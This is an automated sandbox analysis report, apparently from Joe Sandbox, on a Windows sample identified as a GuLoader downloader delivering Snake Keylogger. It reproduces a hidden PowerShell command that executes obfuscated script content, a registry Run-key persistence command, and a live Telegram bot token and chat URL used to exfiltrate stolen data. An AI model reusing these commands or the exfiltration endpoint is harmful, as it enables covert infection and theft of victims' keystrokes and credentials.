Windows
Analysis Report
Torpernes.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Torpernes.exe (PID: 7408 cmdline:
"C:\Users\ user\Deskt op\Torpern es.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3) - powershell.exe (PID: 7440 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$R ligstes=Ge t-Content 'C:\Users\ user\AppDa ta\Local\T emp\Myrmec ophile\ind registreri ngers\Tang erendes\Be neme56.Gem ';$Fortifi katorisk=$ Rligstes.S ubString(5 4389,3);.$ Fortifikat orisk($Rli gstes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7448 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Contentious.exe (PID: 7972 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Conten tious.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3) - cmd.exe (PID: 8012 cmdline:
"C:\Window s\System32 \cmd.exe" /c REG ADD HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n /f /v "c risscrossi ng" /t REG _EXPAND_SZ /d "%Isom erous% -wi ndowstyle minimized $Livsopsvi ng=(Get-It emProperty -Path 'HK CU:\Depone ringsplads en\').sknh edsplejes; %Isomerous % ($Livsop sving)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 8060 cmdline:
REG ADD HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / f /v "cris scrossing" /t REG_EX PAND_SZ /d "%Isomero us% -windo wstyle min imized $Li vsopsving= (Get-ItemP roperty -P ath 'HKCU: \Deponerin gspladsen\ ').sknheds plejes;%Is omerous% ( $Livsopsvi ng)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
Click to see the 4 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 2024-07-25T09:56:55.795858+0200 |
SID: | 2803305 |
Source Port: | 49746 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Unknown Traffic |
Timestamp: | 2024-07-25T09:56:44.263078+0200 |
SID: | 2803274 |
Source Port: | 49737 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-07-25T09:57:07.855040+0200 |
SID: | 2853006 |
Source Port: | 49753 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 2024-07-25T09:56:49.886487+0200 |
SID: | 2803274 |
Source Port: | 49740 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-07-25T09:56:51.785131+0200 |
SID: | 2022930 |
Source Port: | 443 |
Destination Port: | 49742 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 2024-07-25T09:56:47.794238+0200 |
SID: | 2803305 |
Source Port: | 49739 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Unknown Traffic |
Timestamp: | 2024-07-25T09:56:47.325602+0200 |
SID: | 2803274 |
Source Port: | 49737 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-07-25T09:56:12.458951+0200 |
SID: | 2022930 |
Source Port: | 443 |
Destination Port: | 49730 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 2024-07-25T09:56:41.888830+0200 |
SID: | 2803270 |
Source Port: | 49736 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Potentially Bad Traffic |
Timestamp: | 2024-07-25T09:56:53.587006+0200 |
SID: | 2803305 |
Source Port: | 49744 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | Unknown Traffic |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Code function: | 6_2_238291E0 | |
Source: | Code function: | 6_2_23829941 |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_0040615C | |
Source: | Code function: | 0_2_004056A1 | |
Source: | Code function: | 0_2_00402770 | |
Source: | Code function: | 6_2_0040615C | |
Source: | Code function: | 6_2_00402770 | |
Source: | Code function: | 6_2_004056A1 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 6_2_0015F778 | |
Source: | Code function: | 6_2_0015E005 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_0015D7F0 | |
Source: | Code function: | 6_2_0015DE23 | |
Source: | Code function: | 6_2_20CB11C0 | |
Source: | Code function: | 6_2_20CB0D60 | |
Source: | Code function: | 6_2_20CBF8D8 | |
Source: | Code function: | 6_2_20CBF480 | |
Source: | Code function: | 6_2_20CB04A0 | |
Source: | Code function: | 6_2_20CBC4B8 | |
Source: | Code function: | 6_2_20CB0040 | |
Source: | Code function: | 6_2_20CBC060 | |
Source: | Code function: | 6_2_20CBBC08 | |
Source: | Code function: | 6_2_20CBF028 | |
Source: | Code function: | 6_2_20CBD1C0 | |
Source: | Code function: | 6_2_20CB11B0 | |
Source: | Code function: | 6_2_20CBCD68 | |
Source: | Code function: | 6_2_20CB0900 | |
Source: | Code function: | 6_2_20CB1506 | |
Source: | Code function: | 6_2_20CBC910 | |
Source: | Code function: | 6_2_20CBDEC8 | |
Source: | Code function: | 6_2_20CBDA70 | |
Source: | Code function: | 6_2_20CBD618 | |
Source: | Code function: | 6_2_20CBEBD0 | |
Source: | Code function: | 6_2_20CBB7B0 | |
Source: | Code function: | 6_2_20CBB358 | |
Source: | Code function: | 6_2_20CBE778 | |
Source: | Code function: | 6_2_20CBAF00 | |
Source: | Code function: | 6_2_20CBE320 | |
Source: | Code function: | 6_2_238285B0 | |
Source: | Code function: | 6_2_23820498 | |
Source: | Code function: | 6_2_23826FF8 | |
Source: | Code function: | 6_2_23826720 | |
Source: | Code function: | 6_2_23823350 | |
Source: | Code function: | 6_2_23823360 | |
Source: | Code function: | 6_2_23826B78 | |
Source: | Code function: | 6_2_238262C8 | |
Source: | Code function: | 6_2_23825A18 | |
Source: | Code function: | 6_2_23825E70 | |
Source: | Code function: | 6_2_238255C0 | |
Source: | Code function: | 6_2_23827D00 | |
Source: | Code function: | 6_2_23825140 | |
Source: | Code function: | 6_2_23828158 | |
Source: | Code function: | 6_2_238278A8 | |
Source: | Code function: | 6_2_238208F0 | |
Source: | Code function: | 6_2_23820040 | |
Source: | Code function: | 6_2_23827450 |
Networking |
---|
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00405200 |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_004031FF | |
Source: | Code function: | 6_2_004031FF |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040646E | |
Source: | Code function: | 0_2_00404A3D | |
Source: | Code function: | 1_2_0457EAD8 | |
Source: | Code function: | 1_2_0457F3A8 | |
Source: | Code function: | 1_2_0457E790 | |
Source: | Code function: | 6_2_0040646E | |
Source: | Code function: | 6_2_00404A3D | |
Source: | Code function: | 6_2_00156108 | |
Source: | Code function: | 6_2_0015C190 | |
Source: | Code function: | 6_2_0015B328 | |
Source: | Code function: | 6_2_0015C473 | |
Source: | Code function: | 6_2_00156730 | |
Source: | Code function: | 6_2_0015C754 | |
Source: | Code function: | 6_2_0015F778 | |
Source: | Code function: | 6_2_00159858 | |
Source: | Code function: | 6_2_0015CA34 | |
Source: | Code function: | 6_2_00154AD9 | |
Source: | Code function: | 6_2_0015BBBA | |
Source: | Code function: | 6_2_0015BEB7 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_00153578 | |
Source: | Code function: | 6_2_0015D7F0 | |
Source: | Code function: | 6_2_0015D7E0 | |
Source: | Code function: | 6_2_2042B0E0 | |
Source: | Code function: | 6_2_2042C3EC | |
Source: | Code function: | 6_2_20514F11 | |
Source: | Code function: | 6_2_20CB7588 | |
Source: | Code function: | 6_2_20CB0D60 | |
Source: | Code function: | 6_2_20CB3288 | |
Source: | Code function: | 6_2_20CBF8C9 | |
Source: | Code function: | 6_2_20CBF8D8 | |
Source: | Code function: | 6_2_20CB08F0 | |
Source: | Code function: | 6_2_20CBF480 | |
Source: | Code function: | 6_2_20CB0491 | |
Source: | Code function: | 6_2_20CBC4A8 | |
Source: | Code function: | 6_2_20CB04A0 | |
Source: | Code function: | 6_2_20CBC4B8 | |
Source: | Code function: | 6_2_20CB0040 | |
Source: | Code function: | 6_2_20CBC050 | |
Source: | Code function: | 6_2_20CBC060 | |
Source: | Code function: | 6_2_20CBF471 | |
Source: | Code function: | 6_2_20CBBC08 | |
Source: | Code function: | 6_2_20CBF018 | |
Source: | Code function: | 6_2_20CBF028 | |
Source: | Code function: | 6_2_20CB0023 | |
Source: | Code function: | 6_2_20CBD1C0 | |
Source: | Code function: | 6_2_20CB6DF7 | |
Source: | Code function: | 6_2_20CBD1B0 | |
Source: | Code function: | 6_2_20CBCD58 | |
Source: | Code function: | 6_2_20CB0D50 | |
Source: | Code function: | 6_2_20CBCD68 | |
Source: | Code function: | 6_2_20CBC901 | |
Source: | Code function: | 6_2_20CB0900 | |
Source: | Code function: | 6_2_20CBC910 | |
Source: | Code function: | 6_2_20CB4924 | |
Source: | Code function: | 6_2_20CBDEC8 | |
Source: | Code function: | 6_2_20CBAEEF | |
Source: | Code function: | 6_2_20CB3284 | |
Source: | Code function: | 6_2_20CBDEB8 | |
Source: | Code function: | 6_2_20CBDA61 | |
Source: | Code function: | 6_2_20CB7E78 | |
Source: | Code function: | 6_2_20CBDA70 | |
Source: | Code function: | 6_2_20CBD609 | |
Source: | Code function: | 6_2_20CB6E00 | |
Source: | Code function: | 6_2_20CBD618 | |
Source: | Code function: | 6_2_20CBEBC1 | |
Source: | Code function: | 6_2_20CBEBD0 | |
Source: | Code function: | 6_2_20CBBBF8 | |
Source: | Code function: | 6_2_20CB77A8 | |
Source: | Code function: | 6_2_20CBB7A0 | |
Source: | Code function: | 6_2_20CBB7B0 | |
Source: | Code function: | 6_2_20CBB348 | |
Source: | Code function: | 6_2_20CBB358 | |
Source: | Code function: | 6_2_20CBE768 | |
Source: | Code function: | 6_2_20CBE778 | |
Source: | Code function: | 6_2_20CBAF00 | |
Source: | Code function: | 6_2_20CBE310 | |
Source: | Code function: | 6_2_20CBE320 | |
Source: | Code function: | 6_2_23829FB0 | |
Source: | Code function: | 6_2_2382CBD0 | |
Source: | Code function: | 6_2_23828B00 | |
Source: | Code function: | 6_2_2382BF30 | |
Source: | Code function: | 6_2_2382B290 | |
Source: | Code function: | 6_2_238236D8 | |
Source: | Code function: | 6_2_2382A600 | |
Source: | Code function: | 6_2_2382D218 | |
Source: | Code function: | 6_2_2382DA48 | |
Source: | Code function: | 6_2_2382C580 | |
Source: | Code function: | 6_2_238285B0 | |
Source: | Code function: | 6_2_23820D48 | |
Source: | Code function: | 6_2_23820498 | |
Source: | Code function: | 6_2_2382B8E0 | |
Source: | Code function: | 6_2_2382AC48 | |
Source: | Code function: | 6_2_23829FA0 | |
Source: | Code function: | 6_2_2382CBC0 | |
Source: | Code function: | 6_2_238243D8 | |
Source: | Code function: | 6_2_23826FE8 | |
Source: | Code function: | 6_2_23826FF8 | |
Source: | Code function: | 6_2_23826713 | |
Source: | Code function: | 6_2_23826720 | |
Source: | Code function: | 6_2_2382BF20 | |
Source: | Code function: | 6_2_23823350 | |
Source: | Code function: | 6_2_23823360 | |
Source: | Code function: | 6_2_23826B69 | |
Source: | Code function: | 6_2_23826B78 | |
Source: | Code function: | 6_2_2382B281 | |
Source: | Code function: | 6_2_238262B8 | |
Source: | Code function: | 6_2_238262C8 | |
Source: | Code function: | 6_2_2382D20A | |
Source: | Code function: | 6_2_23825A08 | |
Source: | Code function: | 6_2_23825A18 | |
Source: | Code function: | 6_2_23825E60 | |
Source: | Code function: | 6_2_23825E70 | |
Source: | Code function: | 6_2_238285A0 | |
Source: | Code function: | 6_2_238255B1 | |
Source: | Code function: | 6_2_238255C0 | |
Source: | Code function: | 6_2_2382A5F0 | |
Source: | Code function: | 6_2_23827D00 | |
Source: | Code function: | 6_2_23825138 | |
Source: | Code function: | 6_2_23825140 | |
Source: | Code function: | 6_2_23828148 | |
Source: | Code function: | 6_2_23828158 | |
Source: | Code function: | 6_2_2382C570 | |
Source: | Code function: | 6_2_23820488 | |
Source: | Code function: | 6_2_23827898 | |
Source: | Code function: | 6_2_238278A8 | |
Source: | Code function: | 6_2_2382B8D0 | |
Source: | Code function: | 6_2_238208E1 | |
Source: | Code function: | 6_2_238208F0 | |
Source: | Code function: | 6_2_23827CF0 | |
Source: | Code function: | 6_2_23820007 | |
Source: | Code function: | 6_2_2382AC37 | |
Source: | Code function: | 6_2_2382743F | |
Source: | Code function: | 6_2_23820040 | |
Source: | Code function: | 6_2_23822848 | |
Source: | Code function: | 6_2_23827450 | |
Source: | Code function: | 6_2_23822858 |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044C2 |
Source: | Code function: | 0_2_0040206A |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_00406183 |
Source: | Code function: | 6_3_001949CD | |
Source: | Code function: | 6_2_20CB2891 | |
Source: | Code function: | 6_2_20CB69B2 | |
Source: | Code function: | 6_2_20CB6AC6 | |
Source: | Code function: | 6_2_20CB6AEE | |
Source: | Code function: | 6_2_20CB6A8A | |
Source: | Code function: | 6_2_20CB6A92 | |
Source: | Code function: | 6_2_20CB6A8E | |
Source: | Code function: | 6_2_20CB6A9E | |
Source: | Code function: | 6_2_20CB6A9A | |
Source: | Code function: | 6_2_20CB6AA2 | |
Source: | Code function: | 6_2_20CB6A6A | |
Source: | Code function: | 6_2_20CB1FC2 | |
Source: | Code function: | 6_2_20CB2F01 |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
